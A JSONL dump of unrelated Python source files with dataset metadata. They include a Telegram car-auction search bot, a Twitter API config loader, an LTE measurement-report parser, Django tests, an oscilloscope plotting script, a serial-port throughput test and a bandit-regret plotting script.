+{"seq_id": "291454234", "text": "import os\nimport time\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler\n\nfrom data.copart import Copart\nfrom data.utils import EditThread\n\n\ndef search(update: Update, context):\n default_args = [*([0, float('inf')] * 2)]\n names = ['year_from', 'year_to', 'price_from', 'price_to']\n try:\n filters = {names[i]: int(context.args[i]) if i < len(context.args) and context.args[i] != '-1'\n else default_args[i] for i in range(len(default_args))}\n except ValueError:\n return update.message.reply_text('Все аргументы должны быть целочисленными!')\n message = update.message.reply_text('Начинаем поиск...')\n edit_thread = EditThread(message)\n edit_thread.start()\n start_time = time.time()\n copart = Copart()\n output = copart.get_data(filters)\n edit_thread.stop()\n update.message.reply_text(f'Найдено {len(output)} автомобилей.\\n'\n f'Время поиска: {time.time() - start_time:.2f} секунд')\n for car in output:\n update.message.reply_text(car['ld'])\n\n\ndef start(update, _):\n update.message.reply_text('Привет! Это бот-парсер американских автобирж. '\n 'Введите /search {year_from} {year_to} {price_from} {price_to} '\n 'для поиска авто')\n\n\ndef main():\n updater = Updater(os.getenv('tg_token'))\n updater.dispatcher.add_handler(CommandHandler('start', start))\n updater.dispatcher.add_handler(CommandHandler('search', search, pass_args=True))\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "parsing/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "telegram.Update", "line_number": 11, "usage_type": "name"}, {"api_name": "data.utils.EditThread", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 22, "usage_type": "call"}, {"api_name": "data.copart.Copart", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 39, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "596920294", "text": "import json\nimport tweepy\nfrom tweepy import OAuthHandler\n\nclass _Twitter(type):\n\tdef __call__(cls, *args, **kwargs):\n\t\tif not hasattr(cls, 'instance'):\n\t\t\tcls.instance = super(_Twitter, cls).__call__(*args, **kwargs)\n\t\treturn cls.instance\n\nclass Twitter(object, metaclass=_Twitter):\n\tdef __init__(self):\n\t\tself.consumer_key = ''\n\t\tself.consumer_secret = ''\n\t\tself.access_key = ''\n\t\tself.access_secret = ''\n\t\tself.session = None\n\t\tself.api = None\n\t\tself.maxPage = 0\n\t\tself.maxCount = 0\n\n\tdef loadConfig(self):\n\t\twith open(\"config.json\") as data:\n\t\t\tconf = json.load(data)\n\t\t\tself.consumer_key = conf['consumer_key']\n\t\t\tself.consumer_secret = conf['consumer_secret']\n\t\t\tself.access_key = conf['access_key']\n\t\t\tself.access_secret = conf['access_secret']\n\t\t\tself.maxCount = int(conf['maxCount'])\n\t\t\tself.maxPage = int(conf['maxPage'])\n\t\treturn self\n\n\tdef auth(self):\n\t\tif self.session is None:\n\t\t\tself.session = OAuthHandler(self.consumer_key, self.consumer_secret)\n\t\t\tself.session.set_access_token(self.access_key, self.access_secret)\n\t\t\tself.api = tweepy.API(self.session, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n\t\treturn self\n\n\tdef getAPI(self):\n\t\treturn self.api\n\n\tdef getMaxCount(self):\n\t\treturn self.maxCount\n\n\tdef getMaxPage(self):\n\t\treturn self.maxPage\n\n\nAPI = Twitter().loadConfig().auth().getAPI()\nMaxCount = Twitter().getMaxCount()\nMaxPage = Twitter().getMaxPage()", "sub_path": "TwitterScraper/Twitter/Twitter.py", "file_name": "Twitter.py", "file_ext": "py", "file_size_in_byte": 1407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "127485154", "text": "from datetime import datetime, timezone\n\nfrom app.configs.database import SingletonSQLAlchemy\n\n\ndb = SingletonSQLAlchemy()\n\n\nclass BaseModel(db.Model):\n __abstract__ = True\n\n id = db.Column(db.Integer, primary_key=True)\n create_at = db.Column(db.DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))\n updated_at = db.Column(db.DateTime(timezone=True), nullable=True)\n\n def before_save(self, *args, **kwargs):\n return\n\n def before_save(self, *args, **kwargs):\n return\n\n def save(self, commit=True):\n self.before_save()\n\n db.session.add(self)\n if commit:\n try:\n db.session.commit()\n except Exception as error:\n db.session.rollback()\n raise error\n\n self.before_save()\n\n def delete(self, commit=True):\n db.session.delete(self)\n if commit:\n db.session.delete(self)\n", "sub_path": "app/models/bases_model.py", "file_name": "bases_model.py", "file_ext": "py", "file_size_in_byte": 933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "app.configs.database.SingletonSQLAlchemy", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "495205823", "text": "from lxml import etree\nimport dateutil.parser\nfrom pandas import DataFrame, Series\nimport pandas as pd\nfrom functools import reduce\nimport json\nimport pymongo\nfrom pymongo import MongoClient\n\nclass MroReader:\n def __init__(self, afilter, **kwargs):\n super().__init__(**kwargs)\n self.item_dicts=[]\n self.afilter=afilter\n\n def display(self):\n for item_dict in self.item_dicts:\n print(item_dict)\n\n def read(self, item_measurement, item_id):\n for item_element in item_measurement:\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').split(' ')\n else:\n centerFilled=False\n item_dict = {}\n neighbor_list=[]\n for item_v in item_element:\n item_value = item_v.text.replace('NIL', '-1').split(' ')\n _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n if _item_sub_dict['LteNcPci']>=0:\n _neighbor={}\n _neighbor.update({'Pci': _item_sub_dict['LteNcPci']})\n _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n neighbor_list.append(_neighbor)\n else:\n break\n if not centerFilled:\n item_dict.update(item_element.attrib)\n item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n centerFilled=True\n if len(neighbor_list)>0:\n item_dict.update({'NeighborList': neighbor_list})\n self.item_dicts.append(item_dict)\n\n def read_zte(self, item_measurement, item_id):\n for item_element in item_measurement:\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').split(' ')\n if 'LteScEarfcn' not in item_key:\n return\n else:\n centerFilled=False\n item_dict = {}\n neighbor_list=[]\n for item_v in item_element:\n item_value = item_v.text.replace('NIL', '-1').split(' ')\n _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n if _item_sub_dict['LteNcPci']>=0:\n _neighbor={}\n _neighbor.update({'Pci': _item_sub_dict['LteNcPci']})\n _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n neighbor_list.append(_neighbor)\n else:\n break\n if not centerFilled:\n item_dict.update({'id': item_id+'-'+item_element.attrib['MR.objectId']})\n item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n centerFilled=True\n if len(neighbor_list)>0:\n item_dict.update({'NeighborList': neighbor_list})\n self.item_dicts.append(item_dict)\n\n def _filter_by_neighbor_len(self, length):\n return list(filter(lambda x: True if len(x['NeighborList'])==length else False, self.item_dicts))\n\n def _map_neighbor_rsrp_diff(self, index):\n measureList=self._filter_by_neighbor_len(index)\n if len(measureList)==0:\n return []\n return list(map(lambda item: {\n 'CellId': item['id'],\n 'NeighborPci': item['NeighborList'][index-1]['Pci'],\n 'RsrpDiff': item['Rsrp']-item['NeighborList'][index-1]['Rsrp'],\n 'Rsrp': item['Rsrp'],\n 'Pci': item['Pci'],\n 'Ta': item['Ta'],\n 'SinrUl': item['SinrUl']\n }, measureList))\n\n def map_rsrp_diff(self):\n diff_list=list(map(lambda index: self._map_neighbor_rsrp_diff(index+1), list(range(6))))\n combined_list=reduce(lambda first,second: first+second,diff_list,[])\n if len(combined_list)==0:\n return []\n stat_list=list(map(lambda item: {\n 'CellId': item['CellId'],\n 'NeighborPci': item['NeighborPci'],\n 'Pci': item['Pci'],\n 'Diff0': 1 if item['RsrpDiff']<=0 else 0,\n 'Diff3': 1 if item['RsrpDiff']<=3 and item['RsrpDiff']>0 else 0,\n 'Diff6': 1 if item['RsrpDiff']<=6 and item['RsrpDiff']>3 else 0,\n 'Diff9': 1 if item['RsrpDiff']<=9 and item['RsrpDiff']>6 else 0,\n 'Diff12': 1 if item['RsrpDiff']<=12 and item['RsrpDiff']>9 else 0,\n 'DiffLarge': 1 if item['RsrpDiff']>12 else 0,\n 'RsrpBelow120': 1 if item['Rsrp']<20 else 0,\n 'RsrpBetween120110': 1 if item['Rsrp']<30 and item['Rsrp']>=20 else 0,\n 'RsrpBetween110105': 1 if item['Rsrp']<35 and item['Rsrp']>=30 else 0,\n 'RsrpBetween105100': 1 if item['Rsrp']<40 and item['Rsrp']>=35 else 0,\n 'RsrpBetween10090': 1 if item['Rsrp']<50 and item['Rsrp']>=40 else 0,\n 'RsrpAbove90': 1 if item['Rsrp']>=50 else 0,\n 'Ta0or1': 1 if item['Ta']==0 or item['Ta']==1 else 0,\n 'Ta2or3': 1 if item['Ta']==2 or item['Ta']==3 else 0,\n 'Ta4or5': 1 if item['Ta']==4 or item['Ta']==5 else 0,\n 'Ta6or7': 1 if item['Ta']==6 or item['Ta']==7 else 0,\n 'Ta8or9': 1 if item['Ta']==8 or item['Ta']==9 else 0,\n 'Ta10to12': 1 if item['Ta']>=10 and item['Ta']<=12 else 0,\n 'Ta13to15': 1 if item['Ta']>=13 and item['Ta']<=15 else 0,\n 'Ta16to19': 1 if item['Ta']>=16 and item['Ta']<=19 else 0,\n 'Ta20to24': 1 if item['Ta']>=20 and item['Ta']<=24 else 0,\n 'Ta25to29': 1 if item['Ta']>=25 and item['Ta']<=29 else 0,\n 'Ta30to39': 1 if item['Ta']>=30 and item['Ta']<=39 else 0,\n 'TaAbove40': 1 if item['Ta']>=40 else 0,\n 'SinrUl0to9': 1 if item['SinrUl']>=0 and item['SinrUl']<=9 else 0,\n 'SinrUl10to19': 1 if item['SinrUl']>=10 and item['SinrUl']<=19 else 0,\n 'SinrUl20to24': 1 if item['SinrUl']>=20 and item['SinrUl']<=24 else 0,\n 'SinrUl25to29': 1 if item['SinrUl']>=25 and item['SinrUl']<=29 else 0,\n 'SinrUl30to34': 1 if item['SinrUl']>=30 and item['SinrUl']<=34 else 0,\n 'SinrUlAbove35': 1 if item['SinrUl']>=35 else 0\n }, combined_list))\n df = DataFrame(stat_list)\n stat=df.groupby(['CellId','Pci','NeighborPci']).sum().reset_index()\n return json.loads(stat.T.to_json()).values()\n\nclass MrsReader:\n def __init__(self, mrNames, startTime, date_dir, db, **kwargs):\n self.mrNames=mrNames\n self.startTime=startTime\n self.date_dir=date_dir\n self.db=db\n return super().__init__(**kwargs)\n\n def read(self, item_measurement):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': item_element.attrib['id']})\n item_value = item_element[0].text.split(' ')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)\n\n def read_zte(self, item_measurement, eNodebId):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': eNodebId+'-'+item_element.attrib['MR.objectId']})\n item_value = item_element[0].text.split(' ')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)", "sub_path": "Lte.Auxilary/mr/mr_service.py", "file_name": "mr_service.py", "file_ext": "py", "file_size_in_byte": 9319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "functools.reduce", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "96215502", "text": "import re\nimport json\nimport pprint\n\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.test.client import Client\n\nfrom assessment.tests import build_assessments_for_permissions_testing\nfrom utils.helper import HAWCDjangoJSONEncoder\n\nfrom .models import SummaryText\n\nclass SummaryTextTests(TestCase):\n def setUp(self):\n build_assessments_for_permissions_testing(self)\n\n @staticmethod\n def clean_json(json_dump):\n remove_fields = ['created', 'last_updated', 'slug', 'text', 'assessment']\n for node in json_dump:\n node.pop('id')\n for field in remove_fields:\n node['data'].pop(field)\n if node.get('children'):\n SummaryTextTests.clean_json(node['children'])\n\n\n def test_adding_texts(self):\n lvl_1a = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1a',\n slug='lvl_1a',\n text='text')\n\n lvl_1b = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1b',\n slug='lvl_1b',\n text='text')\n\n lvl_2a = SummaryText.add_summarytext(assessment=self.assessment_working,\n parent=[lvl_1a],\n title='lvl_2a',\n slug='lvl_2a',\n text='text')\n\n lvl_2b = SummaryText.add_summarytext(assessment=self.assessment_working,\n sibling=[lvl_2a],\n title='lvl_2b',\n slug='lvl_2b',\n text='text')\n\n assessment_root = SummaryText.get_assessment_root_node(self.assessment_working)\n\n tree_form = SummaryText.dump_bulk(assessment_root)\n # print pprint.pprint(tree_form)\n\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n\n # Swap 2a and 2b\n lvl_2b.move_summarytext(parent=lvl_1a, sibling=None)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2b\"}}, {\"data\": {\"title\": \"lvl_2a\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n # Swap back\n lvl_2b.move_summarytext(parent=None, sibling=lvl_2a)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n", "sub_path": "project/summary/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "assessment.tests.build_assessments_for_permissions_testing", "line_number": 16, "usage_type": "call"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 30, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 30, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 35, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 35, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 40, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 40, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 46, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 46, "usage_type": "name"}, {"api_name": "models.SummaryText.get_assessment_root_node", "line_number": 52, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 52, "usage_type": "name"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 54, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 54, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 63, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 69, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 69, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "613704701", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 22 18:33:47 2019\n\n@author: user\n\"\"\"\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt #for displaying data\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\nimport pandas as pd #to manage dataframe\nimport struct\nfrom math import sqrt\nimport os # file and path operrations\nimport time\nimport sys # get input arguments of the python program\n\n\n\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.offline.offline import _plot_html\n\nimport glob #listing of files\nimport json\n\ndata_path = r\"../out/*/\"\noutput_path = r\"../temp/\"\npng_resolution_dpi = 300\n\n\ndirectories = glob.glob(data_path)\nic_cycle_order = []\n\n\nsorted_directories = sorted(directories)#sorted( directories, key = lambda directory: os.path.getctime(directory)) #getmtime for modified time\nprint(sorted_directories)\n# # for directory in sorted_directories:\n # # print(directory+'\\n')#print(\"{} - {}\".format(directory, time.ctime(os.path.getctime(directory))) )\n\nchannel = int(sys.argv[1]) \nprint('channel = \\n', channel);\nic_cycle = int(sys.argv[2]) \nprint('ic_cycle = \\n', ic_cycle);\nwb_cycle = int(sys.argv[3])\nprint('wb_cycle = \\n', wb_cycle);\nwb_sub_cycle = int(sys.argv[4])\nprint('wb_sub_cycle = \\n', wb_sub_cycle);\n\ntotal_ic_cycles = len(directories) # may add additional checks to avoid parasite folders added for testing\n# may also check json file to get metadata\n# manage the cases where user inputs exceed the limits ic and wb\n# total_wb_cycles = #get this from json file\n\n\n\nif ic_cycle > (total_ic_cycles - 1) :\n\tic_cycle = total_ic_cycles - 1 # this is to display the last data\n\n# confirm the data exist\n\nstream_filename = sorted_directories[ic_cycle] + \"ch_\" + str(channel) + \"_raw.dat\"\nprint(stream_filename);\n\nresult = sorted_directories[ic_cycle].find('IC_CYCLE') \nif result == -1:\n\tprint('Folder name incorrect \\n')\n\tsys.exit()\n\n\t\nwith open(sorted_directories[ic_cycle]+'cfg.json') as json_file: \n\tdata = json.load(json_file)\n\tsampling_period_ns = data['Oscilloscopes']['Picoscope 4444']['Sampling Period NS']\n\tresolution_bits = data['Oscilloscopes']['Picoscope 4444']['Sample Resolution bits']\n\tvoltage_range_str = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Voltage Range']\n\ttotal_samples_per_waveform = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveform Number of Samples']\t\n\twaveforms_per_wb_cycle = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms per WB Cycle']\t\n\t\n\trange_val, range_unit = voltage_range_str.split()\n\trange_val_mv = 0\n\tif range_unit == 'V':\n\t\trange_val_mv = 1000 * int(range_val)\n\telse:\n\t\trange_val_mv = int(range_val)\n\tprint ('range_mv =', range_val_mv)\t\t\t\n\t\n\t\nwith open(sorted_directories[ic_cycle]+'stat.json') as json_file: \n\tdata = json.load(json_file)\n\tcaptured_waveforms = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms found']\n\t\n\n\n\n# get the following data from json\nwb_cycle_total_samples = waveforms_per_wb_cycle * total_samples_per_waveform\ni = 0\nsample_offset = wb_cycle * wb_cycle_total_samples + wb_sub_cycle * total_samples_per_waveform\n\n\n\n\t\n\nexists = os.path.isfile(stream_filename)\nif exists:\n\t# Store configuration file values\n\ttest = 0\nelse:\n\t# Keep presets\n\tprint('ch1 file doesn t exist \\n')\n\tsys.exit()\n\nfp_stream = open(stream_filename, \"rb\")\nfp_stream.seek(sample_offset * 2)\nstream1 = np.fromfile(fp_stream, dtype=([('channel', 'maxADCValue;\ndata = np.float64(stream1['channel'])\ndata = data * range_val_mv / 32768\n\n\n\n\n# # Create a trace\ntrace = go.Scatter(\n y = stream1['channel']\n)\nlayout = go.Layout(\n margin=dict(\n l=0,\n r=0,\n b=0,\n t=0,\n\t\tpad=4\n ),\n paper_bgcolor='#7f7f7f',\n plot_bgcolor='#c7c7c7'\t\n)\nfig = plt.figure()\nfig = go.Figure(data=[trace], layout=layout)\nplotly.offline.plot(fig, filename= output_path + 'ch_' + str(channel) + \".html\", auto_open=False)\n\n\n", "sub_path": "prg/picoscope_4444/python/process_raw_html.py", "file_name": "process_raw_html.py", "file_ext": "py", "file_size_in_byte": 4168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "glob.glob", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "json.load", "line_number": 74, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 128, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 128, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 131, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 143, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 143, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 144, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 144, "usage_type": "attribute"}]}
+{"seq_id": "96900209", "text": "import logging\nimport serial\nimport time\n\n###################################################################################\n\n\nclass CommUART(object):\n def __init__(self, address):\n self.address = address\n self.sc = None\n\n def connect(self):\n logging.debug(\"Opening COM port : {0}\".format(self.address))\n self.sc = None\n while self.sc is None:\n try:\n self.sc = serial.Serial(port=self.address, baudrate=3000000, rtscts=False)\n except serial.serialutil.SerialException as se:\n if 'Device or resource busy:' in se.__str__():\n logging.info('Opening COM port is taking a little while, please stand by...')\n else:\n logging.error('se: {0}'.format(se))\n time.sleep(1)\n logging.debug(\"COM port open successfully.\")\n self.sc.flushInput()\n\n def disconnect(self):\n logging.debug(\"Closing COM port : {0}\".format(self.address))\n self.sc.close()\n\n def receivedPacket(self, length):\n if self.sc is None:\n raise Exception('COM port is not opened.')\n packet = b''\n received = 0\n while received < length:\n serialByte = self.sc.read(1)\n if serialByte is None:\n raise Exception('Bad character.')\n elif len(serialByte) == 0:\n break\n elif received < length:\n received += 1\n packet += serialByte\n return packet\n \n def send(self, data):\n self.sc.write(bytes([data]))\n\n def prbs8(self, curval):\n newbit = (((curval >> 6) ^ (curval >> 5)) & 1)\n return ((curval << 1) | newbit) & 0x7f\n###################################################################################\n\ndef main():\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s : %(message)s')\n\n #comm = CommUART(\"/dev/cu.usbserial-FT0NCE8B\")\n #comm = CommUART(\"/dev/cu.usbmodem143422\")\n comm = CommUART(\"/dev/cu.usbmodem143132\")\n comm.connect()\n\n curval = 0\n #packet = comm.receivedPacket(1)\n #curval = int.from_bytes(packet, byteorder = 'little')\n val = comm.prbs8(0xff)\n byteCount = 0\n dropcnt = 0\n deltatime = 0\n drop = False\n while True:\n try:\n comm.send(val)\n startTime = time.time()\n# packet = comm1.receivedPacket(1)\n endTime = time.time()\n deltatime += endTime - startTime\n # curval = int.from_bytes(packet, byteorder = 'little')\n # if curval != val:\n # dropcnt += 1\n val = comm.prbs8(val)\n byteCount += 1\n\n if deltatime > 0:\n bytesPerSec = byteCount / deltatime #(endTime - startTime)\n\n #print(\"Bytes : {0}\".format(bytes))\n #if drop:\n # print(\"Dropped.... Bytes/sec : {0}\".format(bytesPerSec))\n #else:\n if (byteCount & 0xff) == 0:\n print(\"Bytes/sec : %.2f, drop %d \" %(bytesPerSec, dropcnt))\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt. Exiting.\")\n break\n\n comm.disconnect()\n # comm1.disconnect()\n###################################################################################\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "Python/uartprbs_tx.py", "file_name": "uartprbs_tx.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.debug", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 18, "usage_type": "call"}, {"api_name": "serial.serialutil", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 57, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "533072377", "text": "import matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport matplotlib.ticker as ticker\r\n\r\n# result_file = \"../expt/results/task4_1.txt\"\r\nresult_file = \"finalT2.txt\"#\"outputDataT2.txt\"\r\ninstance_list = [\"../instances/i-1.txt\",\"../instances/i-2.txt\",\"../instances/i-3.txt\"]\r\n# instance_list = [\"i-1.txt\",\"i-2.txt\",\"i-3.txt\"]\r\nalgorithms = [\"thompson-sampling\", \"thompson-sampling\"]\r\nfinal_dict = {\"../instances/i-1.txt\":{}, \"../instances/i-2.txt\":{}, \"../instances/i-3.txt\":{}}\r\nhorizons = [100, 400, 1600, 6400, 25600, 102400]\r\n# final_dict = {\"i-3.txt\":{}, \"i-1.txt\":{}, \"i-2.txt\":{}}\r\nwith open(result_file,'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n x = line.rstrip().split(', ')\r\n if x[1] in final_dict[x[0]].keys():\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += float(x[5])/50.0\r\n else:\r\n final_dict[x[0]][x[1]] = [0]*6\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += float(x[5])/50.0\r\n\r\nfor i,instance in enumerate(instance_list):\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.set_xscale('log')\r\n ax.xaxis.set_ticks(horizons)\r\n ax.get_xaxis().set_major_formatter(ticker.ScalarFormatter())\r\n ts = final_dict[instance][\"thompson-sampling\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling\")\r\n ts = final_dict[instance][\"thompson-sampling-with-hint\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling (with Hint)\")\r\n plt.xlabel(\"Horizon (Logarithmic Scale, Base 2)\")\r\n plt.ylabel(\"Average Regret\")\r\n 